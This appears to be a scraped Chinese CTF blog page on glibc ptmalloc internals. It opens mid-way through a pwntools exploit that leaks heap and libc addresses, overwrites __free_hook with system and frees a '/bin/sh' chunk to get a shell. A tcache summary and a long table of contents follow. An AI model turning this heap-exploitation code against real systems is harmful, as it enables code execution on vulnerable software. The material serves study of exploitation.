# p2 = p64(0)*3+p64(0x13377331)+p64(base)+p64(0x100)+p64(base-0x20+3)+p64(8)
p2 = p64(base-0x20+3)+p64(8)
edit(0,len(p2),p2)
heap = u64(view(1)[0:8])
log.success("heap address is : "+hex(heap))
 
p3 = p64(heap+0x10)+p64(8)
edit(0,len(p3),p3)
unsort_bin = u64(view(1)[0:8])
libc_base = unsort_bin - 0x3c1b58
log.success("unsort bin is : " + hex(unsort_bin))
log.success("libc address is : " + hex(libc_base))

system = libc_base + elf.symbols['system']
free  = libc_base + elf.symbols['__free_hook']
log.success("free address is : "+hex(free))
log.success("system address is : "+hex(system))
 
p4 = p64(free)+p64(0x100)+p64(base+0x50)+p64(0x100)+b'/bin/sh\0'
edit(0,len(p4),p4)
edit(1,8,p64(system))
 
p.recvuntil('Command: ')
sl("3")
p.recvuntil('Index: ')
sl('2')
 
p.interactive()

Tcache attack

内存释放：
- 在 free 函数的最先处理部分，首先是检查释放块是否页对齐及前后堆块的释放情况，便优先放入 tcache 结构中。
内存申请：
- 首先，申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中。
- 其次，申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中。
- 当在 unsorted bin 链上循环处理时，当找到大小合适的链时，并不直接返回，而是先放到 tcache 中，继续处理。

与上条类似，我们同样将分配作为content的chunk称为content chunk ↩
为了方便，我们将分配作为note的chunk称为note chunk ↩

src code

源码分析 ptmalloc

Assembly Language 上一篇

BUUOJ_Writeup 下一篇

ptmalloc src & techniques

基本数据结构及函数

管理chunk

Size and alignment checks and conversions

malloc_chunk

chunk operations

Bin

在malloc_state中的存储

bin数组定位+大小

unlink：从bins中取出chunk

fastbin

unsorted bin

small bin

large bin

Top

总的index

核心结构体

malloc_state

malloc_par

main_arena

mp_

malloc_consolidate

malloc_init_state

申请内存块

–libc-malloc

_int_malloc(非常之长)

变量定义

简单的check

fastbin_range

2.25

2.26

smallbin_range 2.27

largebin_range

unsorted bin 大循环

if small try last remainder

else 取出victim, 准备放入合适的bin中

if exact fit, tcache or return

放入small or large bin

判断iters(大循环结尾)

large request

Search for next largest bin

use_top

补充: 更大的内存分配–sysmalloc

第一种情况: 使用mmap

第二种: 替换或拓展top

释放内存块

__libc_free

_int_free

变量定义

小检查 & tcache

on fastbin

合并非 mmap 的空闲 chunk

轻量级的检测

释放填充

后向合并 - 合并低地址 chunk

前向合并 - 下一块不是 top chunk, 放入unsorted

下一块是 top chunk - 合并到 top chunk

向系统返还内存

释放 mmap 的 chunk

tcache

两个struct

基本宏定义

工作方式

各个函数中关于tcache的部分

tcache_init

–libc-malloc

_int_malloc 2.36

tcache_get()

__libc_free()

_int_free()

tcache_put()

利用之处

UAF

原理

例子 – pwnable.tw_hacknote

关键函数

add

delete

print

分析

Size and alignment `checks` and conversions